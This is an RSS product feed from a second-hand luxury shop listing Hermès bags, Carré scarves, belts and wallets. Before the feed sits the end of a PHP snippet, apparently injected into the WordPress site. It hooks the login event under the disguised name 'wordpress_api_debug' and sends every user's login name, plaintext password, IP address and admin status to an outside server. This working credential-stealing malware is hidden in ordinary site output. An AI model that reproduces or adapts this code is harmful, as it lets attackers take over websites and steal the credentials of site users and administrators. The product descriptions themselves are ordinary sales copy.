'/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" > <channel> <title>Hermès – CBL Bags https://www.cblbags.com/en/ Fri, 18 Jun 2021 09:01:44 +0000 en-US hourly 1 https://wordpress.org/?v=5.4.15 https://www.cblbags.com/wp-content/uploads/2018/07/favicon-100x100.png Hermès – CBL Bags https://www.cblbags.com/en/ 32 32 Hermès pañuelo https://www.cblbags.com/en/p/hermes-panuelo/ Fri, 14 May 2021 13:44:53 +0000 https://www.cblbags.com/?post_type=product&p=49500 Ideal for Hermès Carré fans and collectors! This design brings you the vibrant colors of India.

La entrada Hermès pañuelo se publicó primero en CBL Bags.

]]>
WE BUY AND SELL HERMÈS SECOND-HAND BAGS!

Hermès Chasse en Inde Carré. In this unforgettable Carrè, Michèle Duchene has illustrated India’s vibrant colors and variety of fauna.   Made in pure silk its 90x90cm measurements allow you to wear it in multiple ways depending on the look you want for that special event, As a head scarf, around your neck and even as a waist band. It is in good condition except for a very small yellow stain on border (see photo). Includes box.

La entrada Hermès pañuelo se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-5/ Fri, 14 May 2021 11:30:01 +0000 https://www.cblbags.com/?post_type=product&p=49476 Hermès Carrés are a timeless symbol of status and elegance.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
RENEW YOUR WARDROBE! WE BUY YOUR HERMÈS BAGS.

Hermès Sulfure & Presse Papiers II Carré.  Also known as Cathy Latham-Audibert, Her output at Hermes covers over 45 incredible years. Best known for her subtly auto-referential designs. This Carré designed in vibrant oranges shows her love for a strong-colored pallete and incredible skill with details. In very good condition, this article is made for Carré fans. Includes box and care guide.

 

 

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-4/ Fri, 14 May 2021 09:05:41 +0000 https://www.cblbags.com/?post_type=product&p=49475 This essential Hermès accessory complements any outfit. If you're a Carré collector, this one is waiting for you!

 

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
WE BUY YOUR HERMÈS BAGS. CONTACT US!

Hermès Etriers Carré. The first edition, dated 1964, was designed and signed by Francoise de la Perrière, one of the best-known Hermès illustrators.  The artist found her inspiration for the Etriers design in Émile Hermes’ Collection and portrays numerous equestrian harnesses and a varied collection of 18th and 19th century stirrups. This essential Hermès accessory complements any outfit. It can be worn many ways – around your neck, as a top, at the waist or as a headscarf! In very good condition, includes box.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/46229/ Wed, 09 Dec 2020 14:37:37 +0000 https://www.cblbags.com/?post_type=product&p=46229 Rare Hermès Carré Jeu des Somnibus et Dames Blanches. For Hermès fans!

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
WE BUY YOUR HERMÈS BAGS AND SMALL LEATHER GOODS. CONTACT US.

Hermès Carré Jeu des Somnibus et Dames Blanches. For generations Hermès scarves have been worn by the most famous and influential people. This hard-to-find scarf is very popular with both young and older generations. The first Hermès edition of a 90×90 Carré was designed by Hugo Grygkar in 1937, inspired by a woodblock print property of Robert Dumas. It was reissued in celebration of its 70th anniversary in 2007. It depicts the Omnibus route from the Place de la Bastille to the Place de la Madeleine. Made in 100% fluid silk jersey and vibrant green colors. It is in very good condition, new. Includes box. Dimensions: 90x90cm.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-2/ Wed, 09 Dec 2020 10:59:15 +0000 https://www.cblbags.com/?post_type=product&p=46183 Always the Hermès signature of excellence! This Carré l'Arbre de Soie is made in lovely turquoise and blue colors.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
IF YOU WANT TO RENEW YOUR WARDROBE, CALL US. WE BUY YOUR HERMÈS ITEMS!

When you buy an Hermès scarf, you buy quality. On average, close to 27 colors are represented on each Carré. The name of the artist who designs them is printed on the scarf which gives your investment an added value. This l’Arbre de Soie Carré is  made in 100% silk and is signed by Antoine de Jacquelot. Its spring inspired botanical theme is represented by multicolor leaves and berries in bright turquoise and blues.  It is in very good condition, new. Includes box and exchange card.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès Maxi-Twilly https://www.cblbags.com/en/p/hermes-maxi-twilly/ Mon, 30 Nov 2020 14:11:07 +0000 https://www.cblbags.com/?post_type=product&p=46055 This Hermès Maxi-Twilly is a must, versatile to wear and in beautiful colors!

La entrada Hermès Maxi-Twilly se publicó primero en CBL Bags.

]]>
WE BUY AND SELL HERMÈS BAGS AND SMALL LEATHER GOODS

Hermès Maxi-Twilly Brazil Stole. It is hard to find a scarf which would be as versatile as the Hermes Maxi Twilly! Wear it around the neck, as a headband, or even use it as a belt. It is 100% silk, designer-signed with the initials L.B. Dimensions: 216 cm x 20 cm. Its beautiful array of colors makes this piece no die-hard Hermès fan should be without. It is in very good condition, like new.

 

La entrada Hermès Maxi-Twilly se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-drag-porosus-crocodile-exotic-dark-raspberry/ Fri, 03 Mar 2017 10:33:54 +0000 https://www.cblbags.com/?post_type=product&p=11433/ A delicious vintage item resulting from a stunning combination between superb exotic leather and a really special color. A handbag for those who dream of Hermès' exclusivity.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Drag model crafted of exotic leather crocodile Porosus in Dark Raspberry color. This handbag shows a trapezoid shape that enhances its solid and elegant flair. Featuring double top handle, gold hardware and flap with a double H press-lock closure. Reinforced bottom with protective metallic feet. The interior is lined with goatskin leather including two slide pockets and a larger zip pocket.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Belt https://www.cblbags.com/en/p/hermes-belt-quentin-reversible-azul-gris/ Thu, 13 Aug 2015 14:53:04 +0000 https://www.cblbags.com/?post_type=product&p=3103 Hermès Quentin in Pearl grey and blue Jean. A really nice color combination, highlighted by the most accurate palladium buckle choice.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Hermès Quentin Belt, not a very common model within the French brand. This piece is two-sided, featuring a revolving palladium buckle that works and matches perfectly with both sides, in Pearl grey Box Calf and Clémence blue Jean. It has three holes to be adjusted and is thought to be worn high-waisted. Size 70.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Hermès Suitcase https://www.cblbags.com/en/p/hermes-suitcase/ Wed, 20 May 2015 16:42:19 +0000 https://www.cblbags.com/?post_type=product&p=2041 Hermès Bagage Drag in Clémence leather and canvas. A cute vintage piece made in clear colours that will enlighten your summer vacation.

La entrada Hermès Suitcase se publicó primero en CBL Bags.

]]>
In between a travel bag and a suitcase, this Hermès Bagage Drag in Clémence beige-yellow leather and ecru H canvas is a vintage piece from 1988. It closes with two buckle fasteners and a flap; it features gold hardware and a single handle. The item is reinforced at base and has leather trim and sides. G.H initials are engraved in leather on flap’s front part.

La entrada Hermès Suitcase se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-45/ Fri, 30 Apr 2021 12:34:57 +0000 https://www.cblbags.com/?post_type=product&p=49432 La mujer moderna no puede dejar de tener este Hermès III 29 en su colección de bolsos de lujo!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
IT’S TIME TO RENEW YOUR CLOSET! WE BUY YOUR HERMÈS BAGS.

Hermès Evelyne III 29 Bag.  Crafted in black Togo leather with palladium hardware, this sought-after bag represents the elegance and craftsmanship of the brand. You can wear it on the shoulder or crossbody and its exterior back pocket gives you quick access to your important documents. Odorless and in very good condition (see pics). Includes adjustable strap.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-44/ Wed, 28 Apr 2021 13:07:47 +0000 https://www.cblbags.com/?post_type=product&p=49407 Great opportunity for Hermès fans, this Herbag Zip 31 is in impeccable condition!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
IT’S TIME TO RENEW YOUR CLOSET! WE BUY YOUR HERMÈS BAGS. CONTACT US!

Hermès Herbag Zip 31. Crafted in canvas Officier, Hunter leather and palladium hardware, this iconic bag meets all the style and craftsmanship of the brand.  You can wear it over the shoulder, crossbody or in hand. Its easy-wear size has a spacious interior and comes with an exterior pochette and another one inside! It’s in very good condition (see photos) and includes box, ribbon, dustbag, tirette, clochette, keys, lock and small dustbag, strap.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-43/ Thu, 22 Apr 2021 09:24:41 +0000 https://www.cblbags.com/?post_type=product&p=49354 If you want to travel in style and luxury, this Hermès 50 "Relax" Travel bag is for you!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL HERMÈS BAGS. CONTACT US!

Hermès Kelly 50 “Relax” Travel. This large Hermès Kelly 50  travel bag is crafted in Sikkim leather with palladium hardware. It’s an extraordinary collector’s item for fans who love to travel in style with a bag that guarantees the traditional Hermès craftsmanship.  It is in good overall  condition, with very slight wear marks on corners (pls see pics). Comes with dustbag, tirette, clochette, keys and lock, and protective felt.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-42/ Fri, 05 Feb 2021 09:10:45 +0000 https://www.cblbags.com/?post_type=product&p=46759 This Evelyne III Medium is a must-have for Hermès fans! Perfect size for city and travel.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL SECOND-HAND HERMÈS BAGS. CONTACT US!

Hermès Evelyne III Medium. This Evelyne has the perfect size for your city and travel events! Crafted in the spectacular Togo leather and palladium hardware. It has great capacity and a large exterior back pocket so that your important documents are handy and safe. Adjustable and removable strap allows for shoulder and crossbody use. It is odorless and in good condition, some interior stains, corners with slight wear but kept in nice condition, wear on exterior top borders on either side of the strap, stains on inside of exterior back pocket (please see photos).

 

 

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-41/ Fri, 29 Jan 2021 14:18:47 +0000 https://www.cblbags.com/?post_type=product&p=46707 Attention Vintage Hermès collectors! Atención, colecionistas de Hermès Vintage! This lovely Kelly 32 crafted in black crocodile is waiting for you.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL HERMÈS SECOND-HAND BAGS. CONTACT US.

Hermès Kelly 32 Vintage. Crafted in black crocodile skin with gold tone hardware, this Kelly is for Vintage lovers! It is in good vintage condition, considering it was issued c 1950 decade. For wear details please refer to photos. The handle is not original.

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-40/ Mon, 25 Jan 2021 10:54:07 +0000 https://www.cblbags.com/?post_type=product&p=46645 This Hermès Kelly 32, crafted in the softest burgundy calfskin is definitely a collector's choice!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL HERMÈS SEOND-HAND BAGS. EXPERT APPRAISALS.

Hermès Kelly 32 Vintage. This wonderful Hermès Vintage bag is crafted in the softest burgundy box-calf leather with gold-tone hardware. Ideal for Vintage collectors. It is in very good vintage condition, odorless and includes dustbag, detachable shoulder strap, tirette, clochette, keys and lock. Presents hairline scratches on hardware and loss of patina, small scratch on exterior back. Marks on leather exterior base (see photos).

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bolso https://www.cblbags.com/en/p/hermes-bolso/ Thu, 21 Jan 2021 14:06:39 +0000 https://www.cblbags.com/?post_type=product&p=46618 Don't miss out on this awesome Hermès Birkin 30!

La entrada Hermès bolso se publicó primero en CBL Bags.

]]>
IF YOU’RE THINKING OF RENEWING YOU CLOSET, WE BUY YOUR HERMÈS BAGS! EXPERT APPRAISALS.

Hermès Birkin 30. Crafted in the marvelous Togo leather with palladium hardware. This Birkin is iconic for its elegance and quality and its the model most sought after by Hermès fans. It’s never been worn and includes box, ribbons twilly w/box, dustbag, tirette, clochette, keys and lock w/dustbag, care booklet, invoice, rain protector, felt closure protector, plastic protectors on hardware.

 

 

La entrada Hermès bolso se publicó primero en CBL Bags.

]]>
Hermès Carré https://www.cblbags.com/en/p/hermes-carre-3/ Mon, 14 Dec 2020 09:22:43 +0000 https://www.cblbags.com/?post_type=product&p=46249 En preciosos colores rojos y dorados, este Carré de Hermès es el complemento ideal para su vestuario en cualquier temporada!

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
WE BUY AND SELL SECOND-HAND LUXURY BAGS. EXPERT APPRAISALS

Hermès Carré Les Tuileries. Diseñado por Joachim Metz. Este Carré, llamado así por los famosos jardines parisinos que conducen al Louvre, tiene su inspiración en la elaborada entrada a los jardines. Motivo central: la estatua ecuestre de Mercurio montando a Pegaso que se encuentra cerca de la entrada oeste. Dimensiones: 90x90cm. Incluye caja. En impresionantes colores rojos y dorados, se encuentra en muy buen estado, como nuevo.

La entrada Hermès Carré se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-39/ Fri, 11 Dec 2020 14:40:19 +0000 https://www.cblbags.com/?post_type=product&p=46284 If you are a Vintage collector , this Kelly 32 Retourné, in beautiful burgundy color, is for you!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
RENEW YOUR WARDROBE AND SELL US YOUR HERMÈS BAGS!

Hermès Kelly 32 Retourné Vintage. Crafted in soft box-calf leather, burgundy color with gold-tone hardware. Its casual look and soft rounded borders is a favorite among collectors of the brand’s style and savoir-faire, especially of the Kelly model. Odorless and in very good vintage condition. Includes dustbag, tirette, clochette, lock and keys.

 

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès bag https://www.cblbags.com/en/p/hermes-bag-38/ Thu, 03 Dec 2020 11:01:31 +0000 https://www.cblbags.com/?post_type=product&p=46155 This Hermès Evelyne TGM is your ideal travel or city companion! Follow the trend!

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL SECOND-HAND LUXURY BAGS. IF YOU WANT TO SELL YOUR HERMÈS CONTACT US!

Hermès Evelyne TGM. This elegant bag is crafted in exquisite Gold Taurillon Clemence leather with palladium hardware. It is one of the brand’s signature bags, sought after by both modern-day men and women who love its practical design and excellent craftsmanship . It opens to a spacious suede interior, and also has an exterior back pocket complete with a push-button strap to ensure quick access to important essentials. Its front presents a perforated H and it has an adjustable canvas strap that allows for shoulder or crossbody wear. Includes dustbag. It is in very good general condition except for some marks on its back exterior leather, very slight wear marks on corners, wear marks on interior top borders and a small stain inside. (see pics)

 

 

La entrada Hermès bag se publicó primero en CBL Bags.

]]>
Hermès Double Sense Tote https://www.cblbags.com/en/p/hermes-double-sense-tote/ Tue, 01 Dec 2020 14:55:01 +0000 https://www.cblbags.com/?post_type=product&p=46105 This Hermès  Double Sense Tote es versatile, practical and elegant. It belongs to the league of classics!

La entrada Hermès Double Sense Tote se publicó primero en CBL Bags.

]]>
IS IT TIME TO RENEW YOUR WARDROBE? WE BUY YOUR HERMÉS BAGS. CONTACT US.

Hermès Double Sense Tote. Discreet, practical, light-weight, reversible and always with the excellent Hermés craftsmanship. This moder was designed by Pierre-Alexis Dumas for the 2010 Fall-Winter Collection. His intention was to design a minimalist look that presents the extraordinary Clémence skin, soft and adaptable to your contents. Its reversible option offers you a two-in-one bag, this one in black and brown, depending on you wardrobe and your mood. It is the perfect companion for your travels, day shopping or important work events. In very good condition, like new. Twilly is not included.

La entrada Hermès Double Sense Tote se publicó primero en CBL Bags.

]]>
Hermès Wallet https://www.cblbags.com/en/p/hermes-wallet-3/ Fri, 26 Jun 2020 12:04:07 +0000 https://www.cblbags.com/?post_type=product&p=36211 This Hermès Dogon Duo Wallet has the undisputed seal of elegance and craftsmanship of the House.

La entrada Hermès Wallet se publicó primero en CBL Bags.

]]>
WE BUY YOUR HERMÈS BAGS. CALL US!

HERMÈS Dogon Duo Wallet. Inside and out, this Hermès  Wallet is an extraordinary piece of craftsmanship. Exterior is in orange color Togo leather with goldtone hardware and its interior is crafted in soft lambskin. Its closure is the iconic “Clou de Selle” and the interior has plenty of space for cards in two different compartments. A plus is the smaller independent wallet for bills or change with zip top and additional card slots. In very good condition, except for almost imperceptible hairline scratches on hardware.

 

La entrada Hermès Wallet se publicó primero en CBL Bags.

]]>
Hermès Clutch https://www.cblbags.com/en/p/hermes-clutch-2/ Mon, 10 Feb 2020 17:38:58 +0000 https://www.cblbags.com/?post_type=product&p=33406 This Hermès Jige Clutch is for the Vintage enthusiasts!

La entrada Hermès Clutch se publicó primero en CBL Bags.

]]>
WE BUY THE HERMÈS B

This 1976 Hermès Jige Vintage Clutch is specially for collectors! Crafted in lovely ocean blue Swift leather, white stitching and “H” closure . In fair condition. Presents evident wear on corners and all along the flap borders and shows signs of flaking along exterior top. Small pink stain inside. Includes care booklet, Customer Service card (Hermès Spa).

La entrada Hermès Clutch se publicó primero en CBL Bags.

]]>
Hermès Wallet https://www.cblbags.com/en/p/hermes-wallet-2/ Tue, 14 Jan 2020 17:34:21 +0000 https://www.cblbags.com/?post_type=product&p=32399 This Hermès Azap Wallet is very special, its exterior crafted in vibrant red Epsom leather. Inside: a splash of multicolor silk lining!

La entrada Hermès Wallet se publicó primero en CBL Bags.

]]>
WE BUY YOUR HERMÈS BAGS AND SMALL LEATHER GOODS. CONTACT US.

Stunning Hermès Azap Long Silk Inn C wallet. Exterior is crafted in red Epsom leather with palladium hardware and interior lining in multicolor silk. Odor free. Includes box. In very good condition except for soft darkening of zipper’s leather strap.

La entrada Hermès Wallet se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-37/ Fri, 20 Dec 2019 15:39:43 +0000 https://www.cblbags.com/?post_type=product&p=31856 No need for words! This Hermès Kelly 28 is the maximum expression of elegance and sophistication.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL HERMÈS BAGS. EXPERT APPRAISALS.

This Hermès Kelly 28 bag is truly unique. It has the horseshoe seal that comes with bags made to order. Crafted in a lovely Epsom leather Apricot color with soft grey calfskin interior. The champagne color Permabrass hardware is also special; its light gold color  allows you to combine easily with silver or gold accessories. It is in very good condition, new! Includes box, tirette, clochette, lock, keys, invoice, rain protector, strap, 3 dustbags, materials booklet and protective felt.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-36/ Mon, 16 Dec 2019 12:31:31 +0000 https://www.cblbags.com/?post_type=product&p=31532 To speak of quality, luxury and orange color...is to speak of this Hermès Kelly 35. In perfect condition. Comes with all its extras.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
WE ARE EXPERTS AT BUYING AND SELLING LUXURY BAGS.

When you talk luxury, this Hermès Kelly 35 honors its name. It is crafted in the marvelous Togo leather, in the Hermès iconic orange with gold tone hardware. It can be worn in hand, on the shoulder or crossbody and is in perfect condition. Includes paper bag, box, strap, dustbag, tirette, clochette, lock and keys, rain protector, felt.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès https://www.cblbags.com/en/p/hermes-3/ Wed, 13 Nov 2019 18:29:55 +0000 https://www.cblbags.com/?post_type=product&p=30536 The Hermès Dogon Duo is your luxury wallet, crafted in Togo leather in Pelouse color. In excellent condition with lots of space for your cards, bills and change.

La entrada Hermès se publicó primero en CBL Bags.

]]>
IF YOU WANT TO RENEW YOUR WARDROBE, WE CAN BUY YOUR LUXURY BAGS

 

Inside and out, this Hermès Dogon Duo Wallet is an extraordinary piece of craftmanship. Exterior is in Pelouse color Togo leather with palladium hardware and its interior is crafted in soft lambskin. Its closure is the iconic “Clou de Selle” and the interior has plenty of space for cards in two different compartments. A plus is the smaller independent wallet for bills or change with zipp top and additional card slots.- In very good condition, like new.

La entrada Hermès se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-35/ Wed, 13 Nov 2019 18:10:08 +0000 https://www.cblbags.com/?post_type=product&p=30506 If you belong to the exclusive Hermès fan club, this Birkin 35 is for you. Crafted in Togo leather in green Pelouse. It is in excellent condition, new.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
WE BUY AND SELL SECOND HAND LUXURY BAGS. EXPERT APPRAISALS

The most sought after…impossible to get…Hermès pièce de resistance that only the fortunate few have. This Birkin 35 is crafted in  the iconic Togo leather in a lovely green Pelouse color and Palladium hardware. The interior is crafted in matching color calfskin. It is in excellent condition, new. Includes dustbag, maintenance booklet, tirette, clochette, keys and lock.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Wallet https://www.cblbags.com/en/p/hermes-wallet/ Tue, 12 Nov 2019 18:43:39 +0000 https://www.cblbags.com/?post_type=product&p=30471 A deluxe wallet, this Hermès Dogon Duo is crafted in Curry colorTogo leather. In excellent condition, it has ample space and compartments for your cards, bills and coins.

La entrada Hermès Wallet se publicó primero en CBL Bags.

]]>
We sell and buy luxury second hand bags

Inside and out, this Hermès Dogon Duo Wallet is an extraordinary piece of craftmanship. Exterior is in Curry color Togo leather with gold hardware and its interior is crafted in soft lambskin. Its closure is the iconic “Clou de Selle” and the interior has plenty of space for cards in two different compartments. A plus is the smaller independent wallet for bills or change with zipp top and additional card slots.- Includes original box.- In very good condition, like new.

La entrada Hermès Wallet se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-34/ Tue, 12 Nov 2019 12:19:55 +0000 https://www.cblbags.com/?post_type=product&p=30370 Hermès Picotin 18 Lock Bag in Taurillon Clémence leather Étoupe with Palladium hardware. A different, lasting tote. It is brand new.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
In CBL Bags we specialize in buying and selling second-hand luxury bags like this wonderful Picotin 18 Lock Bag, an easy to wear model. Made in Taurillon Clémence leather, “Étoupe” grey color, this piece has palladium hardware and reinforced base. The bag is a tote style item, open at its top, with two short handles to carry and an adjustable strap with lock to close the bag. It comes with lock, keys and two dustbags, a big one for your Picotin and a smaller one for the keys. It also has a lace with the “calèche” motif from Hermès. It’s discreetly elegant. Hermès gals don’t need to show off.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-33/ Fri, 08 Nov 2019 10:26:17 +0000 https://www.cblbags.com/p/hermes-bag-33/ A wonderful Birkin bag 35 by Hermès with soft and resistant Clemence skin in a delicious color as the Rose Jaiupur is. A bag that will give an elegant touch to your most casual outfits.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This classic Hermes Birkin bag 35 is made of Clemence skin in Rose Jaipur color combined with palladium hardware. The Clemence leather of this Birkin bag 35 has a very soft texture to the touch and the outside is completely water resistant. Like all of their kind it features the triangular shape, the flap with three partitions and strap clasp, double handle and reinforced bottom with metallic feet. The interior, crafted of tonal goatskin leather, includes a wall pocket and a zippered pocket.  In CBL Bags we are experts on the purchase and sale of luxury bags. Contact us!

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-32/ Thu, 17 Oct 2019 10:16:57 +0000 https://www.cblbags.com/?post_type=product&p=30046 An iconic handbag, rigid and everlasting. This piece of art will walk by your side thanks to its comfy strap band and its medium size.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Do you want to renew your wardrobe? In CBL Bags we are traditional experts in appraissing luxury second-hand bags. Come visit us!! 

This wonderful Kelly Sellier 32 is crafted in exquisite Chamonix calfskin leather in Gold color, Hermès iconic tonality. The straight flap with closure tabs, the top handle, its triangular shape, reinforced base with metallic protection studs…, every feature that makes the Kelly what it is can be found in this wonderful medium size model. Its flap opens up to a goatskin lining with three pockets, a zipper one and two slide pockets. The gold tone hardware elegantly matches with the Gold color, creating one of the most desired combinations. It is iin very good condition. Includes dustbag, shoulder strap, tirette, clechette, padlock and keys.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-31/ Mon, 30 Sep 2019 15:13:07 +0000 https://www.cblbags.com/?post_type=product&p=29543 Join the Hermès Evelyne fan club! This Evelyne Poche III 29 is lightweight, beautifully crafted in Taurillon Clemence leather. Its Étoupe color is good for all seasons and the girth-like strap lets you wear it on the shoulder or crossbody. It's never been worn and comes with all its complements.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Supple, spacious, deliciously crafted in Taurillon Clemence leather are only a few of the words that describe an Hermès Evelyne. Sewn without a lining with an “H” perforation which the initiates wear against the body. Its Étoupe color is perfect for any season. It has a back pocket and a girth-like shoulder and crossbody strap. It is in very good condition, never worn. It’s a must-have you can’t let pass!

CBL Bags buys and sells luxury second-hand bags. Expert Appraisals. 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-30/ Fri, 06 Sep 2019 13:02:05 +0000 https://www.cblbags.com/?post_type=product&p=29362 Hermès Birkin 35: the seal of undisputed elegance! It is one of Hermès most sought after bags. The combination of its marvelous black Togo leather with palladium hardware makes it your ideal companion for all your important events. It is in very goo condition, except for very minor scratches on the hardware. Don't miss out on the opportunity of owning this Birkin. You will surely enjoy the experience while looking chic and elegant at the same time.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This classic Hermès Birkin 35 bag is crafted in black Togo leather combined with palladium hardware. It has the traditional characteristics of a Birkin bag: Double handles, with the three front flaps and the metal nails that protect its base. Its interior lining also in black leather has two pockets, one of them with a zipper closure. It includes dustbags large and small, tirette, clochette, lock, keys and rain protector. It is in very good condition, except for very minor scratches on the closure hardware.

In  we are dedicated to buying and selling luxury bags like this Hermès Birkin 35. Contact us!

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès https://www.cblbags.com/en/p/hermes-2/ Thu, 05 Sep 2019 17:34:05 +0000 https://www.cblbags.com/?post_type=product&p=29341 If elegance and style is your norm, this Hermès Clutch Médor is for you! Crafted in exquisite Swift Calfskin in Gold color with a gold-plated closure. In excellent condition, never worn. Don't pass on this great opportunity!

La entrada Hermès se publicó primero en CBL Bags.

]]>
Elegance and luxury always represent Hermès in all its products, as is the case of this Clutch Médor. Crafted in exquisite Swift calfskin in Gold color and with a gold-tone metal closure, this is an all occasion piece. It has one interior pocket and goatskin lining. Plastic protectors on hardware still in place. It is in very good condition, never worn.

Don’t think twice, if you have luxury second-hand bags you want to sell, contact us!

La entrada Hermès se publicó primero en CBL Bags.

]]>
Hermès https://www.cblbags.com/en/p/hermes/ Wed, 04 Sep 2019 09:52:47 +0000 https://www.cblbags.com/?post_type=product&p=29189 Hermès fans recognize in this gorgeous Kelly 35 the house's traditional elegance and style. Crafted in Epsom leather and Hermès vibrant Ultraviolet color with gold hardware, it's ideal for city and travel use.

La entrada Hermès se publicó primero en CBL Bags.

]]>
We are dedicated to buying and selling second hand luxury bags.

This stunning Hermès Kelly 35 follows the luxury and style of the house. It’s perfect for city and travel wear and can be worn in hand or on the shoulder. It’s crafted in Epsom leather and the distinctive Ultraviolet Hermés color with gold-plated hardware. Includes big and small dustbags, tirette, clochette, padlock, keys and rain protector. Minor scratches on hardware. In very good condition.

